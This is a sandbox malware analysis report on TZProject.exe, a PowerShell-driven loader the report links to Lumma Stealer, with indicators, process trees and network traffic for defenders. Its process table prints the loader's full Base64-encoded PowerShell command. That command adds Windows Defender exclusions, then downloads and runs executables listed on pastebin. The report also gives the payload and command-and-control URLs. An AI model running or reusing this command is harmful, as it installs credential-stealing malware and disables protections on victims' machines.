File name:

TZProject.exe

Full analysis: https://app.any.run/tasks/af84fa24-7ff2-4276-8b6c-6b1b3dc0fadd
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 14, 2025, 14:16:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
susp-powershell
pastebin
github
lumma
stealer
exfiltration
loader
netreactor
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

F111DFEE984789E3F1BC348F761F0299

SHA1:

14C81BB485D366960DBA752123AA688B9DBC9395

SHA256:

7F8DA99A109BBB8863F0DEFAFBEA8160FB21457C2CB977881E577323907D1A36

SSDEEP:

768:2qqeJWZdFE2ECEL8JRLg23zrNKu8s9punqfaSYxnoXbOfC11kFQ5eg:Sg2ECELcLBzRK5s9puBfabO/FQ7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4708)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4708)

    • Executing a file with an untrusted certificate

      • nb5tyoim.yrl0.exe (PID: 5968)
      • nb5tyoim.yrl0.exe (PID: 6016)

    • Steals credentials from Web Browsers

      • nb5tyoim.yrl0.exe (PID: 6016)

    • Actions looks like stealing of personal data

      • nb5tyoim.yrl0.exe (PID: 6016)

    • LUMMA has been detected (YARA)

      • nb5tyoim.yrl0.exe (PID: 6016)

    • LUMMA has been detected (SURICATA)

      • nb5tyoim.yrl0.exe (PID: 6016)

    • LUMMA mutex has been found

      • nb5tyoim.yrl0.exe (PID: 6016)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • TZProject.exe (PID: 2232)

    • Starts POWERSHELL.EXE for commands execution

      • TZProject.exe (PID: 2232)
      • powershell.exe (PID: 4708)

    • Checks Windows Trust Settings

      • TZProject.exe (PID: 2232)

    • Base64-obfuscated command line is found

      • TZProject.exe (PID: 2232)

    • BASE64 encoded PowerShell command has been detected

      • TZProject.exe (PID: 2232)

    • Application launched itself

      • powershell.exe (PID: 4708)
      • nb5tyoim.yrl0.exe (PID: 5968)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4708)

    • Executes application which crashes

      • nb5tyoim.yrl0.exe (PID: 5968)

    • There is functionality for taking screenshot (YARA)

      • nb5tyoim.yrl0.exe (PID: 6016)

    • Searches for installed software

      • nb5tyoim.yrl0.exe (PID: 6016)

  • INFO

    • Create files in a temporary directory

      • TZProject.exe (PID: 2232)

    • Reads Environment values

      • TZProject.exe (PID: 2232)

    • Reads the machine GUID from the registry

      • TZProject.exe (PID: 2232)
      • nb5tyoim.yrl0.exe (PID: 6016)

    • Reads the computer name

      • TZProject.exe (PID: 2232)
      • nb5tyoim.yrl0.exe (PID: 5968)
      • nb5tyoim.yrl0.exe (PID: 6016)

    • Checks supported languages

      • TZProject.exe (PID: 2232)
      • nb5tyoim.yrl0.exe (PID: 5968)
      • nb5tyoim.yrl0.exe (PID: 6016)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4708)

    • Found Base64 encoded file access via PowerShell (YARA)

      • TZProject.exe (PID: 2232)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • TZProject.exe (PID: 2232)

    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • TZProject.exe (PID: 2232)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • TZProject.exe (PID: 2232)

    • Disables trace logs

      • powershell.exe (PID: 4708)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4708)

    • Checks proxy server information

      • powershell.exe (PID: 4708)
      • WerFault.exe (PID: 6060)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4708)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4708)

    • The executable file from the user directory is run by the Powershell process

      • nb5tyoim.yrl0.exe (PID: 5968)

    • .NET Reactor protector has been detected

      • nb5tyoim.yrl0.exe (PID: 6016)

    • Reads the software policy settings

      • nb5tyoim.yrl0.exe (PID: 6016)
      • WerFault.exe (PID: 6060)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 6060)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (55.8)
.exe | Win64 Executable (generic) (21)
.scr | Windows screen saver (9.9)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:02:07 17:23:10+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 11
CodeSize: 33792
InitializedDataSize: 2048
UninitializedDataSize: -
EntryPoint: 0xa25e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileDescription:
FileVersion: 0.0.0.0
InternalName: script.exe
LegalCopyright:
OriginalFileName: script.exe
ProductVersion: 0.0.0.0
AssemblyVersion: 0.0.0.0
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
122
Monitored processes
9
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start tzproject.exe no specs conhost.exe no specs powershell.exe powershell.exe no specs conhost.exe no specs nb5tyoim.yrl0.exe #LUMMA nb5tyoim.yrl0.exe werfault.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1512\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeTZProject.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2232"C:\Users\admin\Desktop\TZProject.exe" C:\Users\admin\Desktop\TZProject.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
0.0.0.0
Modules
Images
c:\users\admin\desktop\tzproject.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
4548\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4708"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AbQB1AEQAVQB1AGUATABOACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4AC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TZProject.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
5400"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
5968"C:\Users\admin\AppData\Roaming\nb5tyoim.yrl0.exe" C:\Users\admin\AppData\Roaming\nb5tyoim.yrl0.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Purpose
Exit code:
3221226505
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\nb5tyoim.yrl0.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
6016"C:\Users\admin\AppData\Roaming\nb5tyoim.yrl0.exe"C:\Users\admin\AppData\Roaming\nb5tyoim.yrl0.exe
nb5tyoim.yrl0.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Purpose
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\nb5tyoim.yrl0.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\msvcp_win.dll
6060C:\WINDOWS\SysWOW64\WerFault.exe -u -p 5968 -s 836C:\Windows\SysWOW64\WerFault.exe
nb5tyoim.yrl0.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
21 095
Read events
21 095
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
7
Unknown types
0

Dropped files

PID
Process
Filename
Type
6060WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nb5tyoim.yrl0.ex_1e4d6bd53c7ee7cb0c64f2577ea4aeb3c7865e9_fcd17f1d_c614fe75-025e-47c4-af12-01ee5610e4f8\Report.wer
MD5:
SHA256:
6060WerFault.exeC:\Users\admin\AppData\Local\CrashDumps\nb5tyoim.yrl0.exe.5968.dmp
MD5:
SHA256:
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0uawmq1l.2uj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2232TZProject.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hulj1bnb.mhx.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5400powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:1382C5528E377AED45D5574A0A2B6FF4
SHA256:BB87F6FCFF3AB527360406ACA5BDB98EAA6154BB6829FCD78C8FCBBCDC2F07C4
5400powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_higqe2gd.szp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2232TZProject.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kz0ulezh.xqc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4708powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d3hcxifz.3mf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4708powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ktcclyz.ram.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6060WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERA5C9.tmp.dmpbinary
MD5:EA9821DCCCB4E9CEB39475B50C46B055
SHA256:13BF7252D4A06E15F37D38823F1E9B36A33B40322F0FB22138898F3C62E9C0CB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
29
DNS requests
7
Threats
18

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
302
140.82.121.3:443
https://github.com/trest1ah/hemma/raw/refs/heads/main/ssh.exe
unknown
GET
200
104.20.3.235:443
https://pastebin.com/raw/muDUueLN
unknown
text
61 b
whitelisted
GET
200
140.82.121.3:443
https://raw.githubusercontent.com/trest1ah/hemma/refs/heads/main/ssh.exe
unknown
executable
418 Kb
whitelisted
POST
403
104.21.89.34:443
https://rehfreshingdrinks.cyou/api
unknown
malicious
POST
200
104.21.89.34:443
https://rehfreshingdrinks.cyou/api
unknown
text
18 b
malicious
POST
200
172.67.136.248:443
https://rehfreshingdrinks.cyou/api
unknown
text
18 b
malicious
POST
403
104.21.89.34:443
https://rehfreshingdrinks.cyou/api
unknown
html
4.44 Kb
malicious
POST
200
172.67.136.248:443
https://rehfreshingdrinks.cyou/api
unknown
text
18 b
malicious
POST
200
172.67.136.248:443
https://rehfreshingdrinks.cyou/api
unknown
text
18 b
malicious
POST
200
104.21.89.34:443
https://rehfreshingdrinks.cyou/api
unknown
text
18.3 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
2.19.96.121:443
Akamai International B.V.
DE
unknown
4
System
192.168.100.255:138
whitelisted
4708
powershell.exe
104.20.3.235:443
pastebin.com
CLOUDFLARENET
whitelisted
4708
powershell.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
4708
powershell.exe
185.199.109.133:443
raw.githubusercontent.com
FASTLY
US
whitelisted
6016
nb5tyoim.yrl0.exe
104.21.89.34:443
rehfreshingdrinks.cyou
CLOUDFLARENET
malicious
6060
WerFault.exe
20.42.73.29:443
watson.events.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.16.206
whitelisted
pastebin.com
  • 104.20.3.235
  • 172.67.19.24
  • 104.20.4.235
whitelisted
github.com
  • 140.82.121.4
whitelisted
raw.githubusercontent.com
  • 185.199.109.133
  • 185.199.108.133
  • 185.199.111.133
  • 185.199.110.133
whitelisted
rehfreshingdrinks.cyou
  • 104.21.89.34
  • 172.67.136.248
malicious
watson.events.data.microsoft.com
  • 20.42.73.29
whitelisted
self.events.data.microsoft.com
  • 51.104.15.253
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Misc activity
ET INFO Packed Executable Download
Misc activity
ET HUNTING EXE Downloaded from Github
6016
nb5tyoim.yrl0.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
A Network Trojan was detected
ET MALWARE Lumma Stealer Related Activity
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
TZProject.exe